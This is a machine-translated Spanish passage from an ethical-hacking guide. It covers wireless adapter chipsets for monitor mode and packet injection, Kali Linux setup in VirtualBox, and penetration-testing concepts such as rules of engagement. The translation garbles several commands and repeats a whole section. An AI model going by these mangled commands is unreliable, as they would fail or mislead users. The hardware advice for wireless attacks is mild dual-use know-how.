adaptador inalámbrico.

Olvídate de la marca por ahora. En cambio, vamos a hablar sobre el cerebro que hace todos los
cálculos dentro del adaptador inalámbrico. Esto es lo que determina si el adaptador es bueno o
malo. Ya sea que admita el modo de inyección y monitoreo y funcione con Kali Linux, la marca es
irrelevante.

Lo que se usa dentro de ese adaptador es importante y, por lo tanto, el conjunto de chips. Hay
muchos conjuntos de chips que admiten el modo de monitor y la inyección de paquetes y Kali
Linux. Hay uno que está hecho por la compañía llamada Atheros y su modelo es AR9271. Este
conjunto de chips admite el modo de monitor o la inyección de paquetes, o puede usar el conjunto
de chips para crear un punto de acceso falso, o puede usarlo para piratear redes.

Por lo tanto, puede usar este conjunto de chips para hacer prácticamente todos los ataques de Kali Linux. los
Machine Translated by Google

El único problema con este conjunto de chips es que solo admite 2,4 gigahercios, por lo que si
su objetivo usa 5 gigahercios o algunos de los dispositivos están conectados a través de 5g,
entonces no podrá comunicarse con estos dispositivos.

Ni siquiera podrás verlos, por lo que no podrás lanzar ataques contra ellos. Eso no es porque el
conjunto de chips no sea bueno, sino porque no puede ver el tráfico de 5 gigahercios.

Si desea obtener un adaptador que use este conjunto de chips, tiene dos opciones. Bueno, tienes
muchas opciones, pero te voy a hablar de dos. Primero, hay una opción económica que puede
obtener un adaptador inalámbrico sin marca que usa este conjunto de chips y puede usarlo para
realizar todos los ataques que acabo de mencionar.

Lo único es que este adaptador no tiene marca, por lo que es un poco más económico. La
segunda opción es obtener el adaptador inalámbrico Alpha AWUS036NHA fabricado por alpha,
que es una empresa muy popular y sigue fabricando excelentes adaptadores inalámbricos.

Tiene el mismo chipset y tendrá la misma compatibilidad. La única diferencia es la calidad de


construcción. Este es un producto de mucha más calidad hecho por una muy buena compañía.

Ambos funcionan muy bien, pero la única diferencia es que el adaptador Alpha tiene un mayor
alcance y es más confiable. Los adaptadores económicos son mucho más pequeños, mucho
más compactos, por lo que si estás en un lugar público, es mucho más fácil de usar que el Alpha,
que es grande y tiene una gran antena.

El siguiente conjunto de chips del que quiero hablar está hecho por la compañía llamada Realtek.
El modelo es RTL8812AU. Este conjunto de chips solo recibió soporte de Kali Linux en la versión
1 de 2017 y este conjunto de chips admite el modo de monitor, la inyección de paquetes y
también la frecuencia de 2,4 y 5 gigahercios.

El único problema con este conjunto de chips es que no parece tan confiable, ya que algunos de
los ataques pueden necesitar una señal más fuerte, algunos de los ataques fallarán y tendrá que
volver a hacerlo y, a veces, la tarjeta simplemente se desconectará. entonces tienes que
conectarlo de nuevo.

Este chipset tiene una vez más dos opciones. Puede obtener un adaptador inalámbrico económico
que es mucho más barato que el Alpha, y solo tiene el mismo conjunto de chips, o puede obtener
el Alpha, que es una muy buena compañía con una buena reputación y es un adaptador más
fuerte, por lo que llegar a más lejos
Machine Translated by Google

redes, porque tendrás una señal más fuerte.

Con el adaptador Alpha que usa este chipset es Alpha AWUS036ACH. Puede seguir
adelante y comparar sus especificaciones y obtener el adecuado para usted.
Lo más importante es el chipset. No es la marca. Los económicos son mucho más baratos.

Son más compactos, por lo que son mejores. Puedes usarlos mejor en público pero no
son tan fuertes como los Alpha. Los alfa le darán una mejor señal, por lo que serán más
confiables, pero los económicos también funcionarán perfectamente bien. Todos soportarán
muchos ataques de penetración.

La única diferencia es solo la calidad de construcción. En cuanto a la compatibilidad, los


adaptadores económicos funcionarán tan bien como los Alpha porque usan el mismo
conjunto de chips. Una vez más, lo más importante es el conjunto de chips que se usa
dentro del adaptador inalámbrico.
Machine Translated by Google

Capítulo 3 Instalación de Virtual Box y Kali Linux

Virtual Box es un software que se especializa en virtualizar varios sistemas operativos


que puede instalar en Windows, Macintosh o cualquier sistema operativo Linux y Solaris.
Es gratis para descargar. Una vez que haya llegado al sitio, puede optar por descargar
diferentes paquetes de plataforma.

Una vez que haya descargado Virtual Box, podrá crear y ejecutar múltiples VM-s
(máquinas virtuales). Los manuales de usuario sobre cómo instalar Virtual Box, están
todos en su sitio web que ya se enumeran en el capítulo anterior. Usar el software es
simple y se recomienda ejecutar Kali Linux en él.

Puede usar otro entorno virtual similar, como vmWare, pero personalmente he usado
Virtual Box durante muchos años, por lo tanto, eso es a lo que me referiré en este libro.

Kali Linux es una distribución de Linux del sistema operativo que puede usar como su
sistema operativo principal o ejecutar virtualmente. Puedes ejecutarlo en forma de DVD,
o incluso desde USB. Una vez que haya descargado el archivo ISO, puede instalarlo en
la parte superior de su sistema operativo existente.

Kali Linux es el mejor kit de herramientas / software de prueba de penetración que tiene
cientos de herramientas integradas, listas para usar para pruebas de penetración en
cualquier red. Kali Linux es para probar una red existente e intentar encontrar posibles
vulnerabilidades, para que se pueda mejorar la seguridad general de la red.

Kali Linux también es fácil de usar, y las categorías de herramientas integradas son para
recopilación de información, análisis forense, ingeniería inversa, pruebas de estrés,
evaluación de volnerabilidad, herramientas de informes, herramientas de explotación,
cálculo de privilegios, mantenimiento de acceso y mucho más.

Una vez que haya descargado Kali Linux y esté listo para instalarlo en un entorno virtual,
hay algunos detalles que debe tener en cuenta. Cuando crea una nueva máquina virtual
para Kali, debe asignar al menos 4 Gb de espacio y otros 20 Gb para el disco duro virtual.

Una vez que haya creado una nueva máquina virtual completa, debe ir a la configuración
y asegurarse de ajustar la configuración de red eligiendo conectar la máquina virtual a su
enrutador. Una vez que haya terminado con la configuración, debería estar
Machine Translated by Google

capaz de arrancar la imagen. El comando que debe escribir es


"startx"

luego presione enter. Esto comenzará a instalar la GUI (interfaz gráfica de usuario) desde el
disco duro, que también se recomienda. Hasta que se instale la GUI, hay algunas preguntas que
debe responder, como el idioma, el teclado, la ubicación y la configuración del reloj para la zona
horaria.

Una vez completada la instalación, debe reiniciar la imagen para que arranque desde el disco
duro. Después de que se complete el reinicio, Kali solicitará los detalles de inicio de sesión en la
CLI (interfaz de línea de comandos). Para el nombre de usuario, escriba
"raíz"

y para la contraseña, escriba


"toor"

y pulsa enter. Si es nuevo en CLI y no conoce ningún comando ni qué escribir, no se preocupe.
Siempre puede cambiar a la GUI escribiendo el comando

"startx"

y pulsa enter. Esto abrirá la GUI fácil de usar que le permitirá tener acceso a todas las
herramientas de Pen Test que discutiremos más adelante. Otra configuración básica que debe
realizar es el direccionamiento IP.

Kali Linux por defecto busca una dirección IP de su DHCP, pero se recomienda asignar una
dirección IP estática, para que no se pierda qué IP representa qué máquina. El comando CLI que
necesita para asignar una dirección IP en Kali es:

"Ifconfig eth0 10.10.10.2/24 arriba"

A continuación, debe configurar la puerta de enlace predeterminada, que es la dirección IP de su


enrutador. Para hacer eso, escriba el comando:

“Ruta agregar por defecto gw 10.10.10.1”

Una vez que se completan estas configuraciones, haga ping a la dirección IP de su enrutador escribiendo
el comando:

"Ping 10.10.10.1"
Machine Translated by Google

Una vez que tenga accesibilidad a su puerta de enlace predeterminada y pueda acceder a Internet
con ese enrutador, debe probar la conectividad a Internet escribiendo el comando:

"Hacer ping a www.google.com"

Si esto tiene éxito, significa que su Kali Linux virtualmente instalado está conectado a Internet. La
razón por la que necesita acceso a Internet es porque desea actualizar su Kali Linux.

Actualizar su Kali Linux es su máxima prioridad. La primera tarea que debe realizar después de una
instalación limpia es actualizar su sistema operativo. Advanced Packaging Tools, también conocido
como APT, amplía las funcionalidades de los paquetes de Debian al buscar repositorios e instalar
o actualizar paquetes junto con todas las dependencias requeridas.

Abra su consola y escriba "apt-get update", que se usa para volver a sincronizar los archivos de
índice del paquete local con su fuente como se define en el archivo de lista de fuentes. El comando
de actualización siempre debe usarse primero, antes de realizar una actualización o una
actualización de distribución.

A continuación, debe actualizar Kali emitiendo la opción "--y", que continúa con la instalación sin la
molestia de escribir sí cada vez. Entonces, ¿qué significa apt-get upgrade?

Bueno, se usa para instalar las versiones más nuevas de todos los paquetes instalados en el
sistema. Entonces se actualizan los paquetes existentes en Kali con nuevas versiones disponibles.
Es importante tener en cuenta que el comando de actualización no cambiará ni eliminará paquetes
que no se estén actualizando, y no instalará paquetes que aún no estén presentes.

Por último, debe ejecutar el comando "actualización de distribución". Este comando actualiza todos
los paquetes actualmente instalados en el sistema y sus dependencias.

También elimina paquetes obsoletos del sistema. Lo siguiente que debe hacer es reiniciar su
máquina. Después de reiniciar su máquina, ahora tiene una versión nueva y limpia de Kali.

Para enumerar los paquetes de Debian instalados en su máquina, debe ejecutar el siguiente
comando: “sudo apt list –installedX”

Si hay un montón de ellos y quiere saber si una herramienta específica ya está


Machine Translated by Google

instalado, puede filtrar los resultados agregando el argumento "filtro grep".

Para mostrar una descripción completa de un paquete e identificar sus dependencias,


ejecute el siguiente comando: "dpkg --status nombre del paquete"

Y finalmente, para eliminar un paquete de Kali, debe ejecutar el siguiente comando; "sudo
apt-get remove name ÿ un-install package" Por supuesto, debe reemplazar el nombre del

paquete por el nombre de su aplicación.


Finalmente, quiero explicarte cómo tu sistema utiliza los repositorios oficiales de Kali. Toda
la magia sucede en el archivo "sources.list".

Puede echar un vistazo a ese archivo abriéndolo con el panel de hojas cada vez que ejecuta
su comando de actualización, Kali busca en el contenido de este archivo para realizar el
proceso de actualización.

Actualizar su Kali Linux es su máxima prioridad. La primera tarea que debe realizar después
de una instalación limpia es actualizar su sistema operativo. Advanced Packaging Tools,
también conocido como APT, amplía las funcionalidades de los paquetes de Debian al
buscar repositorios e instalar o actualizar paquetes junto con todas las dependencias
requeridas.

Abra su consola y escriba "apt-get update", que se usa para volver a sincronizar los archivos
de índice del paquete local con su fuente como se define en el archivo de lista de fuentes.
El comando de actualización siempre debe usarse primero, antes de realizar una
actualización o una actualización de distribución.

A continuación, debe actualizar Kali emitiendo la opción "--y", que continúa con la instalación
sin la molestia de escribir sí cada vez. Entonces, ¿qué significa apt-get upgrade?

Bueno, se usa para instalar las versiones más nuevas de todos los paquetes instalados en
el sistema. Entonces se actualizan los paquetes existentes en Kali con nuevas versiones
disponibles. Es importante tener en cuenta que el comando de actualización no cambiará ni
eliminará paquetes que no se estén actualizando, y no instalará paquetes que aún no estén
presentes.

Por último, debe ejecutar el comando "actualización de distribución". Este comando actualiza
todos los paquetes actualmente instalados en el sistema y sus dependencias.

También elimina paquetes obsoletos del sistema. Lo siguiente que debe hacer es reiniciar
su máquina. Después de reiniciar su máquina, ahora tiene
Machine Translated by Google

una versión fresca y limpia de Kali.

Para enumerar los paquetes de Debian instalados en su máquina, debe ejecutar el siguiente
comando: “sudo apt list –installedX”

Si hay muchos de ellos y desea saber si una herramienta específica ya está instalada, puede
filtrar los resultados agregando el argumento "filtro grep".

Para mostrar una descripción completa de un paquete e identificar sus dependencias, ejecute
el siguiente comando: "dpkg --status nombre del paquete"

Y finalmente, para eliminar un paquete de Kali, debe ejecutar el siguiente comando; "sudo apt-
get remove name ÿ un-install package" Por supuesto, debe reemplazar el nombre del paquete

por el nombre de su aplicación.


Finalmente, quiero explicarte cómo tu sistema utiliza los repositorios oficiales de Kali. Toda la
magia sucede en el archivo "sources.list".

Puede echar un vistazo a ese archivo abriéndolo con el panel de hojas cada vez que ejecuta
su comando de actualización, Kali busca en el contenido de este archivo para realizar el
proceso de actualización.
Machine Translated by Google

Ahora es el momento de enumerar algunas herramientas importantes que podrían ser muy útiles
para usted como probador de penetración. La primera de la lista se llama aplicación de precarga.
Para instalar este paquete, ejecute el siguiente comando: “sudo apt-

get install preload”

La aplicación de precarga identifica los programas más utilizados por el usuario y precarga
archivos binarios y dependencias en la memoria para proporcionar un acceso más rápido.
Funciona automáticamente después del primer reinicio, después de la instalación.

Su próxima herramienta se llama "bleachbit". Bleachbit libera espacio en el disco y mejora la


privacidad al liberar el caché, eliminar cookies, borrar el historial de Internet, triturar archivos
temporales, eliminar registros y descartar otros archivos innecesarios. Esta aplicación tiene
algunas funciones avanzadas, como triturar archivos para evitar la recuperación y borrar el
espacio libre en el disco para ocultar los rastros de archivos que no se han eliminado por
completo. El comando que necesitas para instalar bleachbit es:

"sudo apt-get install bleachbit"

El siguiente programa es el gestor de arranque. Cada aplicación que se ejecuta mediante el


proceso de arranque ralentiza el sistema. Esto puede afectar el uso de la memoria y el rendimiento
del sistema. Puede instalar el "administrador de inicio" para deshabilitar aplicaciones y servicios
innecesarios que se habilitan durante el inicio.
El comando que necesitas para instalarlo es:

“sudo apt-get install bum”

La siguiente aplicación que debe tener en cuenta e instalar se llama "gnome-do". Si te gusta
ejecutar aplicaciones desde tu teclado, “gnome-do” es la herramienta adecuada para ti. El
comando que necesita para instalar esta herramienta es: "sudo apt-get install gnome-do"

Su próximo software en la lista es el "archivo apt". Esta es una herramienta de línea de comandos
para buscar dentro de los paquetes del sistema de empaquetado "apt". Le permite enumerar el
contenido de un paquete sin instalarlo ni recuperarlo. El comando que necesitas para instalarlo
es:

"apt-get install archivo apt"

Una vez que haya instalado el paquete, también debe actualizarlo usando el comando: “

"actualización de archivo apt"


Machine Translated by Google

La siguiente aplicación que necesita instalar se llama "Scrub". Esta aplicación es un programa de
borrado seguro para compilar con los estándares gubernamentales. El comando que necesita para
instalar esta herramienta es: "sudo apt-get install scrub"

A continuación, debe instalar "Obturador". Shutter es una herramienta de captura de pantalla que
captura imágenes de su escritorio. El comando que necesita para instalar esta herramienta es:

"apt-get instalar obturador"

El siguiente software que debe instalar se llama "Figlet". Este programa hará que su consola se vea
profesional al mostrar un mensaje personalizado, como el nombre de su empresa, por ejemplo. El
comando que necesita para instalar esta herramienta es:

"apt-get install figlet"

A continuación, debe editar el "archivo bashrc", desplazándose hasta el final del archivo y escribiendo
"mensaje figlet". A continuación, guarde, cierre y reinicie su consola, y la próxima vez que vuelva a
iniciar sesión en su consola, lo primero que debería ver es el mensaje que ha proporcionado.

A continuación, debe conocer SSH, también conocido como configuración de Secure Shell. Kali
viene con claves SSH predeterminadas, pero antes de comenzar a usar SSH en Kali, es una buena
idea deshabilitar las claves predeterminadas y generar un conjunto de claves único. El proceso de
mover las claves originales y generar el nuevo conjunto de claves es el siguiente. Primero, abra su
consola y cambie el directorio a la carpeta SSH.

NOTA: Aquí hay algo de ayuda sobre cómo navegar dentro de los directorios;

Para volver al directorio de inicio inmediatamente, use cd ~ O cd Para cambiar


al directorio raíz del sistema de archivos de Linux, use cd /.
Para acceder al directorio de usuario raíz, ejecute cd / root/ como usuario raíz.
Para navegar un nivel de directorio hacia arriba, use cd ..
Para volver al directorio anterior, use cd -

A continuación, debe crear una carpeta de respaldo y debe mover las claves SSH a esa carpeta de
respaldo.
Machine Translated by Google

NOTA: El comando cp es un comando de Linux para copiar archivos y directorios. La


sintaxis es la siguiente:

cp origen destino cp dir1


dir2 cp -opción origen
destino cp -opción1 -opción2
origen destino

En el siguiente ejemplo, copie la carpeta /home/test/paper/ y todos sus archivos en el


directorio /usb/backup/, use el siguiente comando: cp -avr / home/ test/ paper / usb/ backup

-a : conserva los atributos especificados como directorio y modo de archivo, propiedad,

marcas de tiempo, si es posible atributos adicionales: contexto, enlaces, xattr, todo.

-v : Salida detallada.

-r: Copiar directorios recursivamente.

Por último, debe generar el nuevo conjunto de claves, por lo tanto, use el siguiente comando:

"dpkg-reconfigure abre el servidor sh"

A continuación, verá en los siguientes mensajes, que indican que se generaron sus claves
ssh:

Crear clave SSH2 RSA; Esto puede tomar algo de tiempo …

Crear clave SSH2 DSA; Esto puede tomar algo de tiempo …

Crear clave SSH2 ECDSA; Esto puede tomar algo de tiempo …

A continuación, debe verificar los hash de la clave ssh con el siguiente comando:
“md5sum ssh_host_*”
Aquí el * representa sus nuevas claves, así que compare estos hashes usando los
siguientes comandos:

“cd default_kali_keys/”
"md5am*"

Después de regenerar los pares de claves SSH, puede iniciar el servicio SSH a través de
Machine Translated by Google

/usr/sbin/sshd desde la CLI.

Una vez que haya iniciado SSH, si desea verificar que el servicio se está ejecutando,
realice una consulta "netstat". Desde la salida, debería ver que SSH ahora está
escuchando en el puerto 22.
Machine Translated by Google

Capítulo 4 Introducción a las pruebas de penetración

Ya hemos discutido los conceptos básicos de Linux, específicamente Kali Linux, así como
qué software y hardware adicional podría necesitar como Ethical Hacker. Sin embargo, en
lugar de saltar directamente a la línea de comandos o la interfaz gráfica de usuario de Kali,
debe saber más sobre los procedimientos una vez que acepte un trabajo como hacker ético.

Por lo tanto, en primer lugar, analizaremos la comprensión de las pruebas de penetración y


cómo funcionan en términos de reconocimiento y huella. Después de eso, vamos a discutir
cómo realizar una prueba de penetración y cómo escanear sus objetivos.

Primero, tenemos que entender por qué hacemos pruebas de penetración en primer lugar.
Puede parecer una pregunta obvia, pero aquí le daremos más detalles. A continuación,
hablaremos sobre los diferentes tipos de pruebas de penetración, pero no solo hay diferentes
tipos, sino también diferentes personas que también están involucradas y que debe tener en cuenta.

Luego, pasaremos por las tres etapas diferentes de las pruebas de penetración para que
comprenda completamente cuáles son. Veremos la etapa previa al ataque, en la que pasamos
mucho tiempo porque queremos establecer algunos parámetros, además de protegernos
legalmente.

Luego veremos la etapa 2 donde veremos las cosas que haremos durante el ataque. Luego,
veremos los pasos posteriores al ataque y hablaremos sobre los estándares que debe seguir.

Algunos de los estándares los realizan los fabricantes, y algunos de ellos son estándares
abiertos, por lo que deberá decidir cuál desea seguir en función de lo que está tratando de
lograr. Una vez que encuentre el estándar para usted, manténgalo.

Pero a la pregunta; "¿Por qué hacemos una prueba de penetración en primer lugar?" Bueno,
esta parece una pregunta fácil o pensaría que la respuesta es bastante sencilla, pero hay
algunas razones por las que hacemos pruebas de penetración.

En primer lugar, queremos evaluar el perfil de seguridad actual de la organización mediante


la simulación de un ataque para averiguar qué vulnerabilidades podría aprovechar un
atacante malicioso.

Otra razón legítima por la que hacemos pruebas de penetración es para crear medidas de
seguridad. Dado que vamos tras la red, ¿no tiene sentido seguir adelante y descubrir o tal
vez rediseñar nuestros mecanismos de seguridad actuales?
Machine Translated by Google

Muchas personas sienten que la prueba de penetración está diseñada para señalar vulnerabilidades,
pero no solo señalaremos la vulnerabilidad, sino que también debemos resaltar los efectos que esa
debilidad o esa vulnerabilidad representan para la empresa.

Al completar una prueba de penetración, podemos entregar un informe completo con los detalles de
todo lo que hemos descubierto. También podría argumentar que las pruebas de penetración están
diseñadas no solo para mostrar las brechas en su modelo de seguridad, sino que también pueden
beneficiar la recuperación ante desastres y la planificación de la continuidad del negocio.

El objetivo es simular métodos que los atacantes maliciosos utilizarían para intentar obtener acceso
no autorizado a su red.

En primer lugar, debe asegurarse de enumerar los objetivos de la prueba de penetración.


Algunas empresas pueden o no necesitar que se prueben ciertos elementos. Establecer parámetros
para esas pruebas debe ser el enfoque principal, y las limitaciones o justificaciones de atacar esos
sistemas.

Otra forma en la que puede asegurarse de realizar una prueba de penetración decente es seguir una
metodología, y hablaremos sobre los métodos más adelante, pero desea concentrarse en uno,
porque la mayoría de los planes garantizarán que cubra todos sus bases

La documentación es otro factor vital de una prueba de penetración decente. Queremos asegurarnos
de que el cliente pueda entender de qué estamos hablando, y el evaluador de penetración debe
asegurarse de que esté disponible para responder cualquier pregunta que pueda surgir del informe
documentado de la prueba de penetración.

Otra forma de asegurarse de hacer una prueba de penetración decente es demostrar que tiene las
herramientas adecuadas. Algunas de estas herramientas serán propietarias, algunas de código
abierto, algunas de ellas harán cosas por usted automáticamente, otras pueden incluir scripts, así
como solo interfaces de línea de comandos estándar.

Otra forma de asegurarse de tener una prueba de penetración decente es elegir quién está
involucrado. Puede que no estés haciendo esto solo. Si lo está haciendo solo, quiere asegurarse de
que usted y todos los demás involucrados en la prueba de penetración sean un probador de
penetración legítimo que siga las reglas de los acuerdos de confidencialidad.

Esto es importante si lo contratan para hacer una prueba de penetración que podría destruir una
empresa. Es su trabajo, su responsabilidad y su integridad asegurarse de ayudar a proteger al cliente.
Machine Translated by Google

También desea asegurarse de que no solo señale lo que está mal, sino que cuando informe los hallazgos,
brinde algunas recomendaciones sobre lo que se debe hacer o lo que se podría hacer para solucionar el
problema.

Ofrecer soluciones todo el tiempo. Además de las cuatro razones principales para realizar una prueba
de penetración, hay un par de otras razones que también debe tener en cuenta.

Uno de ellos podría estar en el aspecto de tratar de idear los cambios que deben realizarse en su
infraestructura para que sea más seguro, ya sea relacionado con el hardware o el software, o incluso si
es el diseño de la red.

También podemos usar los resultados de las pruebas de penetración para crear pasos de preparación
para ayudar a prevenir que se produzcan explotaciones. Otra razón es observar la efectividad de las
máquinas de la red y luego evaluarlas, incluso si esas máquinas son firewalls, enrutadores, conmutadores,
servidores web, servidores de archivos.

También utilizaríamos los resultados de las pruebas de penetración para confirmar nuestras defensas de
seguridad y los controles que tenemos implementados. Por ejemplo, porque tuvo una prueba de
penetración hace 3 meses, eso no significa que algo más no haya cambiado en su red.

Del mismo modo, los resultados de las pruebas de penetración podrían beneficiarnos en la creación de
equipos o administración para ayudarnos a enfocarnos en vulnerabilidades particulares y problemas de
seguridad para capacitar a las personas que están a cargo de esos sistemas.

También utilizaríamos los resultados de las pruebas de penetración para ayudarnos a identificar las
amenazas a las que se enfrentan los activos de nuestra organización, y esto va a cambiar porque las
diferentes empresas pertenecen a una industria diferente.

Por ejemplo, los hospitales buscarán diferentes mecanismos de seguridad en comparación con una
pequeña empresa. Para reducir los gastos de la organización en seguridad de TI y mejorar el retorno de
la inversión o ROI cuando se trata de esos dispositivos de seguridad, debemos identificar y remediar las
vulnerabilidades y debilidades.

También podemos utilizar los resultados de las pruebas de penetración para crear políticas,
procedimientos, implementaciones y nuevos diseños. También podemos utilizar este tipo de informe
para ayudarnos a desarrollar sistemas, procesos, ejecuciones y planes para nuestra empresa.

Y no olvidemos que ciertas empresas tienen que preocuparse por regulaciones específicas. Por último,
generar las mejores prácticas para las regulaciones legales y de la industria; no hay nada peor que tener
una violación de datos y ser demandado
Machine Translated by Google

por una demanda colectiva de sus clientes porque no pudo demostrar que estaba tratando de
proteger sus datos.

Vas a leer muchos términos diferentes que se utilizan cuando se trata de diferentes tipos de
pruebas que se realizan, como una auditoría de seguridad o una evaluación de vulnerabilidades,
mientras todavía estamos hablando de pruebas de penetración.

Algunas personas pueden utilizar todos estos términos indistintamente, pero existen algunas
diferencias considerables, como una auditoría de seguridad que verifica si la empresa sigue
un conjunto de políticas y procedimientos de seguridad estándar.

La evaluación de vulnerabilidades se enfoca en descubrir vulnerabilidades dentro de la red,


pero no proporciona ninguna indicación de si las vulnerabilidades pueden explotarse o la
cantidad de daño que podría resultar.

En resumen, una prueba de penetración es un enfoque sistemático para la evaluación de la


seguridad que también abarca la auditoría de seguridad y demuestra si el atacante puede
explotar con éxito las debilidades de los sistemas.

Cuando se trata de pruebas de penetración, también escuchará diferentes tipos de equipos, y


dado que hay dos tipos de grupos, déjeme explicarle qué es cada uno.

El primero es conocido como equipo rojo. Un equipo rojo también se conoce como el equipo
agresor. Este es un equipo de hackers éticos que realizan pruebas de penetración en sus
sistemas con acceso limitado o nulo a la información interna de la organización.
recursos.

Los equipos rojos atacan con o sin previo aviso, y el equipo rojo puede incluir algunos
administradores de sistemas de diferentes departamentos dentro de la organización.

El otro tipo de equipo se conoce como el equipo azul. El equipo azul es un equipo defensivo.
El equipo azul tiene acceso a todos los recursos e información de la organización.

Su función principal es detectar e intentar mitigar las actividades del equipo rojo y anticipar
cómo podría ocurrir un ataque sorpresa. El equipo azul puede incluir algunos administradores
de sistemas y personal de TI estándar. Es el enfoque de evaluación menos costoso y más
frecuente.

Cuando se trata de los tipos de pruebas de penetración que existen, todo depende de su
enfoque y de la cantidad de información que tenga, o que le haya proporcionado el
Machine Translated by Google

organización antes de que comiencen las pruebas.

Además, también depende de si las pruebas de penetración son internas o externas.


Los resumimos dentro de un cuadro blanco.

Una prueba de pluma de caja blanca significa que tenemos un conocimiento completo de la
infraestructura, y cuando digo experiencia integral, el cliente o la empresa proporcionarán una topología
de red, incluidos todos los diagramas, inventarios de activos y sus inventarios de software.

Una empresa hará este tipo de prueba cuando quiera una auditoría completa de su seguridad. A pesar
de todo esto, la seguridad de la información es un proceso continuo, y las pruebas de penetración nos
brindan una instantánea de la postura de seguridad de esa empresa en ese momento dado.

Otro tipo de prueba es una prueba de caja negra. Esto se divide en dos tipos de pruebas. Uno se
conoce como una prueba ciega. En una prueba a ciegas, el evaluador de penetración no sabe nada
sobre la empresa o el objetivo, pero se informa al objetivo del alcance de la auditoría, es decir, qué,
cómo y cuándo realizará la prueba el evaluador.

En una prueba a ciegas, el atacante simulará las acciones, procesos y procedimientos que tomaría un
atacante real. Vamos a hacer algo de reconocimiento, algunas huellas, un poco de escaneo, y también
veremos alguna información disponible públicamente.

Las pruebas ciegas consumen más tiempo y son más caras debido al tiempo.
El otro tipo de prueba de caja negra se conoce como doble ciego.

Esto también se conoce como prueba de conocimiento cero, por lo que ni el evaluador de penetración
sabe sobre el objetivo, ni el objetivo está informado del alcance de la auditoría, por lo que no saben
qué ni cómo.

Esta es una de las evaluaciones más populares que se utilizan hoy en día debido al aspecto de que
pone a prueba el conocimiento de todos.

También tenemos algo llamado caja gris. Esta es una combinación de pruebas de caja negra y caja
blanca. Este tipo de prueba es cuando el atacante tiene un conocimiento parcial, como un nombre de
dominio de los servidores.

Estos ayudan a ahorrar algo de tiempo en comparación con la caja negra. Esto es solo un ahorro de
tiempo para nosotros porque en una caja negra, es solo cuestión de tiempo antes de que te reconozca
correctamente y llegue a esa zona gris.

La suposición de que va a hacer ese trabajo, también puede proporcionar


Machine Translated by Google

lo que se conoce como una perspectiva dual, que ofrece una inspección completa del sistema tanto
desde la perspectiva del desarrollador como desde la perspectiva del atacante.

Por lo tanto, podemos atacar desde el exterior, así como simular un ataque interno
por parte de un empleado descontento. Hay un par de enfoques diferentes que
podría tomar.

Primero, puede implementar una estrategia anunciada. En este enfoque, el pen


tester debería poder adquirir una visión general completa de la infraestructura de
la organización y luego también tener acceso físico.
El problema aquí es que tiene menos impacto en la red porque sabes que vienen.

Cuando se trata de un enfoque no anunciado, esto es beneficioso cuando se trata


de probar el conocimiento del personal de seguridad, así como de examinar los
ataques de ingeniería social de las organizaciones.
En un enfoque no anunciado, solo la alta dirección está al tanto de estas pruebas
y de que se van a llevar a cabo. Los tipos de TI estándar, como Service Desk,
equipo de infraestructura o equipo de aplicaciones, no tienen idea de cuándo
llegará.
Esto tiende a tener un impacto más significativo y también requiere un proceso
estricto de lo que se va a hacer. El objetivo real de un enfoque no anunciado es
probar el estado de alerta de la infraestructura y la capacidad de respuesta del
personal de TI.
Machine Translated by Google

Capítulo 5 Pruebas de penetración @ Etapa 1

La etapa uno de la prueba de penetración también se conoce como Compromiso previo, y esta etapa
se enfoca en recopilar la mayor cantidad de información posible sobre su objetivo. Esto se puede hacer
utilizando técnicas como el escaneo o la toma de huellas.

Debes establecer tus límites, y eso es lo primero que quieres que se te ocurra, pero al igual que en el
ejército, existen reglas de enfrentamiento. Por ejemplo, al personal militar no se le permite disparar, a
menos que le disparen.

El hecho de que vean a alguien con un arma no significa que puedan seguir adelante y disparar. Todo
depende de la guerra en la que estén. Cada uno tendría sus propias reglas de enfrentamiento, y eso
es lo mismo aquí.

Está creando un permiso formal para realizar la prueba de penetración y, en las reglas de participación,
puede especificar si realiza o no actividades técnicas o no técnicas.

Las reglas de participación definen explícitamente estas actividades. A un profesional de la seguridad


que está haciendo una prueba de penetración se le puede permitir realizar ciertas actividades que
generalmente se consideran ilegales.

Algunos elementos de reglas de compromiso quieren incluir el rango de direcciones IP que puede
probar. Usted no se sale de ese rango ni de los horarios en que realiza la prueba durante el horario
comercial, ni fuera del horario comercial.

Usted puede estar pensando; "¿La prueba de penetración podría tener lugar en cualquier momento?"
Bueno, sí, pero todo depende de si estuviera haciendo una simulación de un ataque de caja gris desde
adentro, por ejemplo, porque eso podría hacerse estrictamente durante el horario comercial.

También desea tener una lista de hosts que el cliente o el departamento pueden considerar restringidos.
Si ve una dirección IP que no está en su lista, ¡no la toque!

También enumerará los métodos de prueba aceptables, como ingeniería social, ataque de denegación
de servicio, qué herramientas se utilizarán, descifradores de contraseñas, rastreadores de red, etc.

Si va a utilizar la herramienta llamada "Nmap", por ejemplo, ¿será un escaneo Nmap agresivo o un
escaneo Nmap privado? También debe especificar la duración de la prueba.

Dependiendo de la prueba en sí o de lo que hayas acordado; algunas pruebas de pluma pueden tomar
Machine Translated by Google

hasta dos o tres meses para lograrlo. Del mismo modo, cualquiera que esté en el equipo de
penetración podría tener un punto de contacto si hay algún tipo de emergencia.

También desea enumerar algunas medidas para evitar que se llame a las fuerzas del orden público
con falsas alarmas que puede generar la prueba, especialmente si se trata de una prueba física.

Sus reglas de compromiso también deben incluir cómo manejar la información que ha recopilado.
Uno de los requisitos previos que debe tener cuando realiza una prueba de penetración para una
empresa es que le proporcionen una computadora portátil.

No es una computadora portátil que pueda conservar, pero es una computadora portátil que puede usar
durante la prueba de penetración, incluidos los informes.

Una vez que haya terminado con la prueba de penetración, les devuelve la computadora portátil con
instrucciones, y quieren guardar esa computadora portátil para posibles pruebas de penetración
futuras como seguimiento.

De esa manera, no se le acusa de almacenar su información en sus sistemas.


La tecnología cambia rápidamente. Si guardan la computadora portátil durante cinco o seis años,
esa computadora portátil podría quedar obsoleta.

Por lo tanto, también puede aconsejar a su cliente que extraiga los discos duros de la computadora
y almacene solo esos, y asegúrese de que los datos se almacenen en una ubicación extremadamente
segura.

Vas a tener una lista de lo que requiere el cliente y la información que recopilas durante el proceso
de la entrevista para que puedas asegurarte de abordarlos en última instancia.

Revisará con el cliente o el departamento lo que debe probarse, como servidores, estaciones de
trabajo, enrutadores, firewalls, dispositivos de red, bases de datos, aplicaciones, seguridad física,
telecomunicaciones, sistemas de voz, etc.
en.

También tendrá que crear una lista de verificación de requisitos. Es decir, lo que el cliente requiere
que hagas con esas pruebas en particular. También hay que especificar los sectores a probar y
organizar a los usuarios.

Por ejemplo, es posible que solo necesite buscar departamentos específicos, como el departamento
de TI. Vas a notificar a la gente de esos departamentos que algo podría estar pasando dentro de la
